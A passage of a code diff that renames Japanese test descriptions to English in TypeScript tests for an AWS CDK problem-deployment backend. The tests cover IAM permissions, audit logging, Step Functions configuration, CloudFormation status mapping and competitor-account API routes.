       // ParticipantPortal 等で別 bucket もあるため count assert は避け、 public-read 設定の
       // ある bucket が存在することで pin。
       tpl.hasResourceProperties(
@@ -358,7 +358,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   });
 
   describe("Issue #1034: SystemAuditWriter Lambda + EventBridge Rule", () => {
-    it("SBT onboarding/offboarding の 6 detailType を listen する EventBridge Rule を持つべき", () => {
+    it("should have an EventBridge Rule listening to the 6 SBT onboarding/offboarding detailTypes", () => {
       tpl.hasResourceProperties(
         "AWS::Events::Rule",
         Match.objectLike({
@@ -376,7 +376,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("SystemAuditWriter Lambda は DEPLOY_ENVIRONMENT + ADMIN_AUDIT_LOG_TABLE_NAME env を持つべき", () => {
+    it("SystemAuditWriter Lambda should have DEPLOY_ENVIRONMENT + ADMIN_AUDIT_LOG_TABLE_NAME env", () => {
       // env が無いと writeAuditEvent が no-op になり、 audit が書かれない silent failure に戻る。
       tpl.hasResourceProperties(
         "AWS::Lambda::Function",
@@ -393,7 +393,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("Issue #1029: CodeBuild FAILED / FAULT / STOPPED / TIMED_OUT event を catch する Rule を持つべき", () => {
+    it("Issue #1029: should have a Rule catching CodeBuild FAILED / FAULT / STOPPED / TIMED_OUT events", () => {
       tpl.hasResourceProperties(
         "AWS::Events::Rule",
         Match.objectLike({
@@ -410,13 +410,13 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   });
 
   describe("legacy 経路の廃止", () => {
-    it("旧 DeployApiGateway (HTTP API) を作らないべき", () => {
+    it("should not create the legacy DeployApiGateway (HTTP API)", () => {
       tpl.resourceCountIs("AWS::ApiGatewayV2::Api", 0);
     });
   });
 
   describe("Competitor Accounts API Lambda (Issue #459 / ADR-002 Phase 2.1)", () => {
-    it("Lambda が COMPETITOR_ACCOUNTS_TABLE_NAME / DEPLOY_ENVIRONMENT / TENKACLOUD_ACCOUNT_ID env を持つべき", () => {
+    it("Lambda should have COMPETITOR_ACCOUNTS_TABLE_NAME / DEPLOY_ENVIRONMENT / TENKACLOUD_ACCOUNT_ID env", () => {
       tpl.hasResourceProperties(
         "AWS::Lambda::Function",
         Match.objectLike({
@@ -433,7 +433,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("Lambda Role に SSM Parameter Store + STS AssumeRole の最小権限を付与するべき", () => {
+    it("should grant least-privilege SSM Parameter Store + STS AssumeRole to the Lambda Role", () => {
       // SSM は path prefix で絞り込み、STS は TenkaCloud- Role 名 pattern で絞り込み。
       tpl.hasResourceProperties(
         "AWS::IAM::Policy",
@@ -464,12 +464,12 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("Output に CompetitorAccountsTableName を含むべき", () => {
+    it("should include CompetitorAccountsTableName in Outputs", () => {
       const outputs = tpl.findOutputs("*");
       expect(Object.keys(outputs)).toEqual(expect.arrayContaining(["CompetitorAccountsTableName"]));
     });
 
-    it("Phase 3.2 / Issue #603: ExternalIdAudit Lambda が rate(1 day) で起動し PutMetricData (namespace 絞り込み) を持つべき", () => {
+    it("Phase 3.2 / Issue #603: ExternalIdAudit Lambda should run on rate(1 day) and have PutMetricData (namespace-scoped)", () => {
       // rate(1 day) schedule は上の resourceCountIs(Rule, 4) の test でも assert 済だが、ここでは
       // ExternalIdAudit 経路の代表 evidence (COMPETITOR_ACCOUNTS_TABLE_NAME env + namespace 絞り込み IAM) を pin する。
       tpl.hasResourceProperties(
@@ -505,7 +505,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("KMS policy は StringLike + Decrypt/GenerateDataKey を持つべき (= SSM SecureString GET/PUT 双方を動かす)", () => {
+    it("KMS policy should have StringLike + Decrypt/GenerateDataKey (supports both SSM SecureString GET/PUT)", () => {
       // **regression 防止**: 旧実装は StringEquals + Decrypt/Encrypt の組合せだった (PR-594
       // /security-review Vuln 1)。`StringEquals` は wildcard 展開しないので Condition が
       // 永久に false で fail-closed、Encrypt は SecureString PUT に不適合 (GenerateDataKey 必要)。
@@ -570,7 +570,7 @@ function synthParticipantPortalLambdaOnly(): Template {
 describe("ParticipantPortalLambda wiring (#535)", () => {
   const tpl = synthParticipantPortalLambdaOnly();
 
-  it("ParticipantPortal Lambda の environment に EVENTS_TABLE_NAME が設定されるべき", () => {
+  it("should set EVENTS_TABLE_NAME in the ParticipantPortal Lambda environment", () => {
     // ADR-006 Notifications backend (PR-524) が Module load 時に EVENTS_TABLE_NAME を
     // 必須で読むので、CDK 配線が無いと Lambda init で throw して portal 全 route が
     // 502 になる (= #535 regression)。本 assertion で再発防止。
@@ -587,7 +587,7 @@ describe("ParticipantPortalLambda wiring (#535)", () => {
     );
   });
 
-  it("ParticipantPortal Lambda の IAM Role に Events table の dynamodb:Query + GetItem を付与するべき", () => {
+  it("should grant Events-table dynamodb:Query + GetItem to the ParticipantPortal Lambda IAM Role", () => {
     // ADR-006: GET /portal/me/notifications が Events table を Query する (= partition 単位)。
     // Issue #1005: submit-flag / hint reveal が共有する event-gate.ts が PK=EVENT#<id> /
     // SK=META を `dynamodb:GetItem` で 1 行引く (= scoring gate)。 grant が漏れていると
@@ -616,7 +616,7 @@ describe("ParticipantPortalLambda wiring (#535)", () => {
     );
   });
 
-  it("ADR-012 Phase 3.A: environment に PROBLEM_ENDPOINTS_TABLE_NAME を持ち catalog env は持たないべき", () => {
+  it("ADR-012 Phase 3.A: should set PROBLEM_ENDPOINTS_TABLE_NAME env without the catalog env", () => {
     // Issue #1158: PROBLEM_ENDPOINTS / BATTLE_PROBLEMS_SCORING は env 4 KB 上限回避のため
     // esbuild bundling.define で build 時 literal 置換し、 Lambda env からは取り除いている。
     tpl.hasResourceProperties(
@@ -644,7 +644,7 @@ describe("ParticipantPortalLambda wiring (#535)", () => {
     expect(vars.BATTLE_PROBLEMS_SCORING).toBeUndefined();
   });
 
-  it("AWS Console SSO 用に DEPLOY_ENVIRONMENT を持つべき", () => {
+  it("should have DEPLOY_ENVIRONMENT for AWS Console SSO", () => {
     const functions = tpl.findResources("AWS::Lambda::Function");
     const fn = Object.values(functions)[0] as {
       Properties?: { Environment?: { Variables?: Record<string, unknown> } };
@@ -653,7 +653,7 @@ describe("ParticipantPortalLambda wiring (#535)", () => {
     expect(vars.DEPLOY_ENVIRONMENT).toBe("development");
   });
 
-  it("AWS Console SSO 用に SSM ExternalId read と CompetitorDeployRole AssumeRole 権限を持つべき", () => {
+  it("should have SSM ExternalId read and CompetitorDeployRole AssumeRole permissions for AWS Console SSO", () => {
     tpl.hasResourceProperties(
       "AWS::IAM::Role",
       Match.objectLike({
@@ -679,7 +679,7 @@ describe("ParticipantPortalLambda wiring (#535)", () => {
     );
   });
 
-  it("ADR-012 Phase 3.A: IAM Role に Endpoints table の Query / PutItem / DeleteItem 権限を付与するべき", () => {
+  it("ADR-012 Phase 3.A: should grant Endpoints table Query / PutItem / DeleteItem to the IAM Role", () => {
     tpl.hasResourceProperties(
       "AWS::IAM::Role",
       Match.objectLike({
@@ -716,7 +716,7 @@ describe("ProblemDeployBackendStack (#778 ADR-016 Phase 2: eventBusArn optional 
   let fullTemplate: Template;
 
   it(
-    "eventBusArn を省略すると local EventBus を 1 つ新規に作るべき (= Lite mode の自己完結)",
+    "should create 1 new local EventBus when eventBusArn is omitted (Lite mode self-contained)",
     () => {
       const app = new cdk.App();
       const stack = new ProblemDeployBackendStack(app, "LiteStack", {
@@ -741,7 +741,7 @@ describe("ProblemDeployBackendStack (#778 ADR-016 Phase 2: eventBusArn optional 
   );
 
   it(
-    "eventBusArn を渡した既存 (= Full mode) では local EventBus を作らないべき",
+    "should not create a local EventBus in the existing path (Full mode) where eventBusArn is provided",
     () => {
       fullTemplate = synthDefault();
       fullTemplate.resourceCountIs("AWS::Events::EventBus", 0);
@@ -750,7 +750,7 @@ describe("ProblemDeployBackendStack (#778 ADR-016 Phase 2: eventBusArn optional 
   );
 
   it(
-    "eventBusArn 省略でも DeployApi / EventApi / CompetitorAccountsApi / GenericScoring Lambda は同じ構成で生えるべき (= 機能 dormant にならない)",
+    "should still provision DeployApi / EventApi / CompetitorAccountsApi / GenericScoring Lambdas in the same shape even when eventBusArn is omitted (features stay live)",
     () => {
       // 前の test で立てた liteTemplate を再利用 (= synth コストを節約)。
       if (!liteTemplate) {

--- a/infrastructure/test/problem-deploy/audit-log.test.ts
+++ b/infrastructure/test/problem-deploy/audit-log.test.ts
@@ -45,7 +45,7 @@ const baseEvent = {
 } as const;
 
 describe("writeAuditEvent (#950)", () => {
-  it("env 配線済なら PutCommand を送って true を返すべき", async () => {
+  it("should send PutCommand and return true when env is wired", async () => {
     const { client, send } = buildMockClient();
     const ok = await writeAuditEvent(baseEvent, client);
     expect(ok).toBe(true);
@@ -66,7 +66,7 @@ describe("writeAuditEvent (#950)", () => {
     expect(item.ttl).toBe(Math.floor(baseEvent.occurredAtMs / 1000) + 90 * 86400);
   });
 
-  it("env が空文字なら no-op で false を返すべき (= 旧 stack 互換)", async () => {
+  it("should noop and return false when env is empty (legacy stack compat)", async () => {
     delete process.env.ADMIN_AUDIT_LOG_TABLE_NAME;
     const { client, send } = buildMockClient();
     const ok = await writeAuditEvent(baseEvent, client);
@@ -83,7 +83,7 @@ describe("writeAuditEvent (#950)", () => {
     errorSpy.mockRestore();
   });
 
-  it("tenantId='SYSTEM' は PK='SYSTEM#<env>' に変換されるべき", async () => {
+  it("should convert tenantId='SYSTEM' to PK='SYSTEM#<env>'", async () => {
     const { client, send } = buildMockClient();
     await writeAuditEvent({ ...baseEvent, tenantId: "SYSTEM" }, client);
     const cmd = send.mock.calls[0]?.[0] as { input?: Record<string, unknown> };
@@ -91,7 +91,7 @@ describe("writeAuditEvent (#950)", () => {
     expect(item.PK).toBe("SYSTEM#test-env");
   });
 
-  it("optional fields (target / ipAddress / userAgent / extra) が undefined ならスキップされるべき", async () => {
+  it("should skip optional fields (target / ipAddress / userAgent / extra) when undefined", async () => {
     const { client, send } = buildMockClient();
     await writeAuditEvent(
       {
@@ -111,7 +111,7 @@ describe("writeAuditEvent (#950)", () => {
     expect(item.extra).toBeUndefined();
   });
 
-  it("extra が指定されると Item に含まれるべき (= 追加情報の保存)", async () => {
+  it("should include extra in the Item when specified (preserves extra info)", async () => {
     const { client, send } = buildMockClient();
     await writeAuditEvent(
       {
@@ -127,7 +127,7 @@ describe("writeAuditEvent (#950)", () => {
 });
 
 describe("extractAuditContext (#950)", () => {
-  it("HTTP API V2 形式 (= authorizer.jwt.claims) から actor / username / ipAddress / userAgent を抽出すべき", () => {
+  it("should extract actor / username / ipAddress / userAgent from HTTP API V2 form (authorizer.jwt.claims)", () => {
     const ctx = extractAuditContext({
       env: {
         event: {
@@ -151,7 +151,7 @@ describe("extractAuditContext (#950)", () => {
     expect(ctx.userAgent).toBe("curl/8.0");
   });
 
-  it("REST API 形式 (= authorizer.claims) でも actor が引けるべき", () => {
+  it("should still extract actor from REST API form (authorizer.claims)", () => {
     const ctx = extractAuditContext({
       env: {
         event: {

--- a/infrastructure/test/problem-deploy/bulk-deploy-create-state-machine.test.ts
+++ b/infrastructure/test/problem-deploy/bulk-deploy-create-state-machine.test.ts
@@ -37,7 +37,7 @@ function asJsonString(definitionString: unknown): string {
 }
 
 describe("BulkDeployCreateStateMachine", () => {
-  it("Distributed Map state を含むべき (= Standard Map ではない、 750 batch のため)", () => {
+  it("should include a Distributed Map state (not Standard Map; for 750 batch)", () => {
     const { template } = buildStack();
     const sm = Object.values(template.findResources("AWS::StepFunctions::StateMachine")).find(
       (r) => {
@@ -53,7 +53,7 @@ describe("BulkDeployCreateStateMachine", () => {
     expect(def).toContain('"ExecutionType":"STANDARD"');
   });
 
-  it("MaxConcurrency が ADR-001 §3 で fix された 50 であるべき", () => {
+  it("MaxConcurrency should be fixed at 50 per ADR-001 §3", () => {
     const { template } = buildStack();
     const sm = Object.values(template.findResources("AWS::StepFunctions::StateMachine")).find(
       (r) => {
@@ -81,7 +81,7 @@ describe("BulkDeployCreateStateMachine", () => {
     expect(def).toContain('"InputType":"JSON"');
   });
 
-  it("S3 Bucket への Read 権限が State Machine Role に付くべき", () => {
+  it("should attach S3 Bucket Read permissions to the State Machine Role", () => {
     const { template } = buildStack();
     // IAM policy で s3:GetObject + s3:ListBucket が付く
     template.hasResourceProperties(
@@ -98,7 +98,7 @@ describe("BulkDeployCreateStateMachine", () => {
     );
   });
 
-  it("Child State Machine の StartExecution 権限が付くべき", () => {
+  it("should attach StartExecution permission to the Child State Machine", () => {
     const { template } = buildStack();
     template.hasResourceProperties(
       "AWS::IAM::Policy",

--- a/infrastructure/test/problem-deploy/cfn-status.test.ts
+++ b/infrastructure/test/problem-deploy/cfn-status.test.ts
@@ -6,21 +6,21 @@ import {
 } from "../../lib/problem-deploy/handlers/shared/cfn-status";
 
 describe("resolveDeploymentStatus", () => {
-  it("CREATE_COMPLETE → COMPLETE 遷移を返すべき", () => {
+  it("should return the CREATE_COMPLETE → COMPLETE transition", () => {
     expect(resolveDeploymentStatus("IN_PROGRESS", "CREATE_COMPLETE", undefined)).toEqual({
       kind: "transition",
       status: "COMPLETE",
     });
   });
 
-  it("UPDATE_COMPLETE も COMPLETE 扱いするべき", () => {
+  it("should also treat UPDATE_COMPLETE as COMPLETE", () => {
     expect(resolveDeploymentStatus("IN_PROGRESS", "UPDATE_COMPLETE", undefined)).toEqual({
       kind: "transition",
       status: "COMPLETE",
     });
   });
 
-  it("CREATE_FAILED → FAILED + reason を埋め込むべき", () => {
+  it("should embed CREATE_FAILED → FAILED + reason", () => {
     const r = resolveDeploymentStatus("IN_PROGRESS", "CREATE_FAILED", "VPC limit exceeded");
     expect(r).toEqual({
       kind: "transition",
@@ -29,19 +29,19 @@ describe("resolveDeploymentStatus", () => {
     });
   });
 
-  it("ROLLBACK_COMPLETE → FAILED に倒すべき", () => {
+  it("should fall ROLLBACK_COMPLETE to FAILED", () => {
     const r = resolveDeploymentStatus("IN_PROGRESS", "ROLLBACK_COMPLETE", undefined);
     expect(r).toEqual({ kind: "transition", status: "FAILED", failureReason: "ROLLBACK_COMPLETE" });
   });
 
-  it("DELETE_COMPLETE → DELETED 遷移を返すべき", () => {
+  it("should return the DELETE_COMPLETE → DELETED transition", () => {
     expect(resolveDeploymentStatus("DELETING", "DELETE_COMPLETE", undefined)).toEqual({
       kind: "transition",
       status: "DELETED",
     });
   });
 
-  it("既に COMPLETE なら CREATE_COMPLETE で再遷移しないべき (二重発火防止)", () => {
+  it("should not re-transition on CREATE_COMPLETE when already COMPLETE (double-fire guard)", () => {
     expect(resolveDeploymentStatus("COMPLETE", "CREATE_COMPLETE", undefined)).toEqual({
       kind: "stable",
     });
@@ -53,7 +53,7 @@ describe("resolveDeploymentStatus", () => {
     });
   });
 
-  it("未知の StackStatus は stable で安全側に倒すべき", () => {
+  it("should fall unknown StackStatus to stable on the safe side", () => {
     expect(resolveDeploymentStatus("IN_PROGRESS", "FUTURE_NEW_STATUS", undefined)).toEqual({
       kind: "stable",
     });
@@ -67,7 +67,7 @@ describe("resolveDeploymentStatus", () => {
 });
 
 describe("serializeStackOutputs", () => {
-  it("Outputs を OutputKey -> OutputValue の JSON にすべき", () => {
+  it("should turn Outputs into OutputKey -> OutputValue JSON", () => {
     const json = serializeStackOutputs([
       { OutputKey: "FrontendUrl", OutputValue: "http://example.com" },
       { OutputKey: "ApiUrl", OutputValue: "http://example.com:8080" },
@@ -78,15 +78,15 @@ describe("serializeStackOutputs", () => {
     });
   });
 
-  it("空配列は空オブジェクトの JSON を返すべき", () => {
+  it("should return the empty-object JSON for an empty array", () => {
     expect(serializeStackOutputs([])).toBe("{}");
   });
 
-  it("undefined は空オブジェクトの JSON を返すべき", () => {
+  it("should return the empty-object JSON for undefined", () => {
     expect(serializeStackOutputs(undefined)).toBe("{}");
   });
 
-  it("OutputKey か OutputValue が欠けたエントリはスキップするべき", () => {
+  it("should skip entries missing OutputKey or OutputValue", () => {
     const json = serializeStackOutputs([
       { OutputKey: "FrontendUrl", OutputValue: "http://example.com" },
       { OutputKey: undefined, OutputValue: "x" },
@@ -97,13 +97,13 @@ describe("serializeStackOutputs", () => {
 });
 
 describe("parseStackOutputs", () => {
-  it("undefined / 空文字 / 壊れた JSON は空オブジェクトを返すべき", () => {
+  it("should return an empty object for undefined / empty string / broken JSON", () => {
     expect(parseStackOutputs(undefined)).toEqual({});
     expect(parseStackOutputs("")).toEqual({});
     expect(parseStackOutputs("{not-json")).toEqual({});
   });
 
-  it("`{key: value}` 形式 (Lambda 由来) を Record<string,string> に戻すべき", () => {
+  it("should convert `{key: value}` form (from Lambda) back to Record<string,string>", () => {
     expect(
       parseStackOutputs(JSON.stringify({ FrontendUrl: "http://x", ApiUrl: "http://y" })),
     ).toEqual({
@@ -112,7 +112,7 @@ describe("parseStackOutputs", () => {
     });
   });
 
-  it("`[{OutputKey, OutputValue}, ...]` 形式 (Step Functions describeStacks 由来) も解釈するべき", () => {
+  it("should also parse `[{OutputKey, OutputValue}, ...]` form (from Step Functions describeStacks)", () => {
     const cfnNative = JSON.stringify([
       { OutputKey: "ParameterValue", OutputValue: "Hello from tc-...", Description: "x" },
       { OutputKey: "ParameterName", OutputValue: "/tc-.../hello" },
@@ -123,7 +123,7 @@ describe("parseStackOutputs", () => {
     });
   });
 
-  it("非 string 値の entry は skip するべき (= best-effort)", () => {
+  it("should skip entries with non-string values (best-effort)", () => {
     expect(parseStackOutputs(JSON.stringify({ A: "ok", B: 123, C: null }))).toEqual({ A: "ok" });
     expect(
       parseStackOutputs(

--- a/infrastructure/test/problem-deploy/competitor-account-lookup.test.ts
+++ b/infrastructure/test/problem-deploy/competitor-account-lookup.test.ts
@@ -14,7 +14,7 @@ function buildDeps(send: ReturnType<typeof vi.fn>) {
 }
 
 describe("resolveVerifiedCompetitorAccount", () => {
-  it("verified=true の行が存在するとき RoleArn / externalIdParameterName を返すべき", async () => {
+  it("should return RoleArn / externalIdParameterName when a verified=true row exists", async () => {
     const send = vi.fn().mockResolvedValue({
       Item: {
         PK: `TENANT#${TENANT_ID}`,
@@ -37,7 +37,7 @@ describe("resolveVerifiedCompetitorAccount", () => {
     expect(send.mock.calls[0]?.[0]).toBeInstanceOf(GetCommand);
   });
 
-  it("verified=false の行は null を返すべき (= backend reject の trigger)", async () => {
+  it("should return null for verified=false rows (trigger for backend reject)", async () => {
     const send = vi.fn().mockResolvedValue({
       Item: {
         PK: `TENANT#${TENANT_ID}`,
@@ -50,13 +50,13 @@ describe("resolveVerifiedCompetitorAccount", () => {
     expect(out).toBeNull();
   });
 
-  it("行が存在しないとき null を返すべき", async () => {
+  it("should return null when the row does not exist", async () => {
     const send = vi.fn().mockResolvedValue({});
     const out = await resolveVerifiedCompetitorAccount(buildDeps(send), TENANT_ID, ACCOUNT_ID);
     expect(out).toBeNull();
   });
 
-  it("competitorRoleName が空文字のとき null を返すべき (= deploy 不能の防御)", async () => {
+  it("should return null when competitorRoleName is empty (defense against deploy-impossible state)", async () => {
     const send = vi.fn().mockResolvedValue({
       Item: {
         verified: true,

--- a/infrastructure/test/problem-deploy/competitor-accounts-routes.test.ts
+++ b/infrastructure/test/problem-deploy/competitor-accounts-routes.test.ts
@@ -91,7 +91,7 @@ const { app } = await import("../../lib/problem-deploy/handlers/competitor-accou
 describe("POST /admin/competitor-accounts", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("201 で externalId / tenkaCloudAccountId を含む body を返すべき", async () => {
+  it("should return 201 with body containing externalId / tenkaCloudAccountId", async () => {
     mocks.createCompetitorAccount.mockResolvedValueOnce({
       awsAccountId: "222222222222",
       region: "ap-northeast-1",
@@ -118,7 +118,7 @@ describe("POST /admin/competitor-accounts", () => {
     expect(body.verified).toBe(false);
   });
 
-  it("validation 失敗 (= awsAccountId が 12 桁でない) は 400 を返すべき", async () => {
+  it("should return 400 on validation failure (awsAccountId not 12 digits)", async () => {
     const res = await app.request("/admin/competitor-accounts", {
       method: "POST",
       headers: { "content-type": "application/json" },
@@ -128,7 +128,7 @@ describe("POST /admin/competitor-accounts", () => {
     expect(mocks.createCompetitorAccount).not.toHaveBeenCalled();
   });
 
-  it("Duplicate は 409 を返すべき", async () => {
+  it("should return 409 on Duplicate", async () => {
     mocks.createCompetitorAccount.mockRejectedValueOnce(
       new mocks.DuplicateCompetitorAccountError("222222222222"),
     );
@@ -148,7 +148,7 @@ describe("POST /admin/competitor-accounts", () => {
 describe("GET /admin/competitor-accounts", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("一覧 (verified 混在) を返し externalId は含めないべき", async () => {
+  it("should return the listing (mixed verified) without including externalId", async () => {
     mocks.listCompetitorAccounts.mockResolvedValueOnce([
       {
         awsAccountId: "222222222222",
@@ -178,7 +178,7 @@ describe("GET /admin/competitor-accounts", () => {
 describe("POST /admin/competitor-accounts/:awsAccountId/verify", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("STS 成功時は 200 + verified=true を返すべき", async () => {
+  it("should return 200 + verified=true on STS success", async () => {
     mocks.verifyCompetitorAccount.mockResolvedValueOnce({
       awsAccountId: "222222222222",
       region: "ap-northeast-1",
@@ -196,7 +196,7 @@ describe("POST /admin/competitor-accounts/:awsAccountId/verify", () => {
     expect(body.verified).toBe(true);
   });
 
-  it("STS AssumeRole 失敗時は 422 + underlyingErrorName を返すべき", async () => {
+  it("should return 422 + underlyingErrorName when STS AssumeRole fails", async () => {
     mocks.verifyCompetitorAccount.mockRejectedValueOnce(
       new mocks.AssumeRoleSanityCheckFailedError("222222222222", "AccessDenied", "denied"),
     );
@@ -208,7 +208,7 @@ describe("POST /admin/competitor-accounts/:awsAccountId/verify", () => {
     expect(body.underlyingErrorName).toBe("AccessDenied");
   });
 
-  it("row なしは 404 を返すべき", async () => {
+  it("should return 404 when there is no row", async () => {
     mocks.verifyCompetitorAccount.mockRejectedValueOnce(
       new mocks.CompetitorAccountNotFoundError("999999999999"),
     );
@@ -229,7 +229,7 @@ describe("POST /admin/competitor-accounts/:awsAccountId/verify", () => {
 // create の 2 step に統一済 (= 仕様簡素化)。 旧テスト群は撤去。
 
 describe("POST /admin/competitor-accounts/:awsAccountId/rotate-external-id (廃止)", () => {
-  it("#1089: rotate endpoint は 404 を返すべき (= 廃止済)", async () => {
+  it("#1089: should return 404 from the rotate endpoint (= removed)", async () => {
     const res = await app.request("/admin/competitor-accounts/222222222222/rotate-external-id", {
       method: "POST",
     });
@@ -240,7 +240,7 @@ describe("POST /admin/competitor-accounts/:awsAccountId/rotate-external-id (廃�
 describe("DELETE /admin/competitor-accounts/:awsAccountId", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("200 + deleted=true を返すべき", async () => {
+  it("should return 200 + deleted=true", async () => {
     mocks.deleteCompetitorAccount.mockResolvedValueOnce(undefined);
     const res = await app.request("/admin/competitor-accounts/222222222222", {
       method: "DELETE",
@@ -270,7 +270,7 @@ describe("/admin/* middleware (Issue #854)", () => {
     else process.env.DEFAULT_USER_ROLE = originalRole;
   });
 
-  it("role 不一致 (= TenantUser) なら 403 forbidden_role を返すべき", async () => {
+  it("should return 403 forbidden_role on role mismatch (TenantUser)", async () => {
     process.env.DEFAULT_USER_ROLE = "TenantUser";
     const res = await app.request("/admin/competitor-accounts", { method: "GET" });
     expect(res.status).toBe(StatusCodes.FORBIDDEN);
@@ -284,7 +284,7 @@ describe("/admin/* middleware (Issue #854)", () => {
     expect(res.status).toBe(StatusCodes.FORBIDDEN);
   });
 
-  it("healthz は role check skip して 200 を返すべき", async () => {
+  it("healthz should skip the role check and return 200", async () => {
     delete process.env.DEFAULT_USER_ROLE;
     const res = await app.request("/admin/competitor-accounts/healthz", { method: "GET" });
     expect(res.status).toBe(StatusCodes.OK);

--- a/infrastructure/test/problem-deploy/competitor-accounts-store.test.ts
+++ b/infrastructure/test/problem-deploy/competitor-accounts-store.test.ts
@@ -47,7 +47,7 @@ function buildShared(): {
 describe("createCompetitorAccount", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("SSM SecureString に ExternalId を Put し DDB に verified=false の row を書くべき", async () => {
+  it("should Put ExternalId into SSM SecureString and write a verified=false row to DDB", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     // 1 回目の SSM.Get は ParameterNotFound、続く Put は成功、最後 DDB.Put 成功。
     ssmSend
@@ -96,7 +96,7 @@ describe("createCompetitorAccount", () => {
     expect(out.verified).toBe(false);
   });
 
-  it("SSM に既存値があれば ExternalId を回さず既存値を返すべき (= 冪等)", async () => {
+  it("should return the existing value without rotating ExternalId when present in SSM (idempotent)", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     ssmSend.mockResolvedValueOnce({ Parameter: { Value: "existing-external-id-xyz" } });
     ddbSend.mockResolvedValueOnce({});
@@ -116,7 +116,7 @@ describe("createCompetitorAccount", () => {
     expect(out.externalId).toBe("existing-external-id-xyz");
   });
 
-  it("同 (tenantId, awsAccountId) を 2 度作ろうとすると DuplicateCompetitorAccountError を投げるべき", async () => {
+  it("should throw DuplicateCompetitorAccountError on attempts to create the same (tenantId, awsAccountId) twice", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     ssmSend.mockResolvedValueOnce({ Parameter: { Value: "ext-id" } });
     ddbSend.mockRejectedValueOnce(
@@ -140,7 +140,7 @@ describe("createCompetitorAccount", () => {
 describe("listCompetitorAccounts", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("Query PK=TENANT# / SK begins_with ACCOUNT# で全 row を返すべき", async () => {
+  it("should return all rows via Query PK=TENANT# / SK begins_with ACCOUNT#", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -181,7 +181,7 @@ describe("listCompetitorAccounts", () => {
 describe("getCompetitorAccount", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("Get が undefined Item を返すと undefined を返すべき", async () => {
+  it("should return undefined when Get returns an undefined Item", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({});
     const out = await getCompetitorAccount(shared, "tenant-acme", "999999999999");
@@ -194,7 +194,7 @@ describe("getCompetitorAccount", () => {
 describe("markCompetitorAccountVerified", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("UpdateCommand で verified=true / verifiedAt を立てるべき", async () => {
+  it("should set verified=true / verifiedAt via UpdateCommand", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Attributes: {
@@ -226,7 +226,7 @@ describe("markCompetitorAccountVerified", () => {
     expect(out.verifiedAt).toBe(NOW_ISO);
   });
 
-  it("ConditionalCheckFailedException は CompetitorAccountNotFoundError に変換するべき", async () => {
+  it("should convert ConditionalCheckFailedException to CompetitorAccountNotFoundError", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockRejectedValueOnce(
       Object.assign(new Error("conflict"), { name: "ConditionalCheckFailedException" }),
@@ -245,7 +245,7 @@ describe("markCompetitorAccountVerified", () => {
 describe("deleteCompetitorAccount", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("row が存在しなければ CompetitorAccountNotFoundError を投げるべき", async () => {
+  it("should throw CompetitorAccountNotFoundError when the row does not exist", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     // ConditionExpression が落ちて ConditionalCheckFailedException を SDK が投げる挙動。
     ddbSend.mockRejectedValueOnce(
@@ -261,7 +261,7 @@ describe("deleteCompetitorAccount", () => {
     expect(ssmSend.mock.calls.length).toBe(0);
   });
 
-  it("最後の 1 行を消したら SSM の ExternalId も削除するべき", async () => {
+  it("should also delete the ExternalId from SSM when the last remaining row is removed", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     ddbSend
       // DeleteCommand 成功
@@ -277,7 +277,7 @@ describe("deleteCompetitorAccount", () => {
     expect(ssmSend.mock.calls.length).toBe(1);
   });
 
-  it("他の row が残っていれば SSM の ExternalId は触らないべき", async () => {
+  it("should not touch SSM ExternalId while other rows remain", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     ddbSend
       .mockResolvedValueOnce({})
@@ -293,7 +293,7 @@ describe("deleteCompetitorAccount", () => {
 describe("rotateExternalIdForAccount", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("SSM Parameter を Overwrite=true で Put し DDB の rotatedAt を更新するべき", async () => {
+  it("should Put the SSM Parameter with Overwrite=true and update DDB rotatedAt", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     // 1. DDB Get で既存 row 確認 → Item あり
     ddbSend.mockResolvedValueOnce({
@@ -358,7 +358,7 @@ describe("rotateExternalIdForAccount", () => {
     expect(out.rotatedAt).toBe(NOW_ISO);
   });
 
-  it("row が無ければ CompetitorAccountNotFoundError を投げ SSM Put しないべき", async () => {
+  it("should throw CompetitorAccountNotFoundError without SSM Put when the row is missing", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     // Get が Item を返さない
     ddbSend.mockResolvedValueOnce({});
@@ -377,7 +377,7 @@ describe("rotateExternalIdForAccount", () => {
     expect(ssmSend.mock.calls.length).toBe(0);
   });
 
-  it("SSM に現 ExternalId が無ければ ExternalIdMissingForRotationError を投げ Put しないべき", async () => {
+  it("should throw ExternalIdMissingForRotationError without Put when no current ExternalId exists in SSM", async () => {
     const { shared, ddbSend, ssmSend } = buildShared();
     // 1. Get Item OK
     ddbSend.mockResolvedValueOnce({
@@ -408,7 +408,7 @@ describe("rotateExternalIdForAccount", () => {
     expect(ssmSend.mock.calls.length).toBe(1);
   });
 
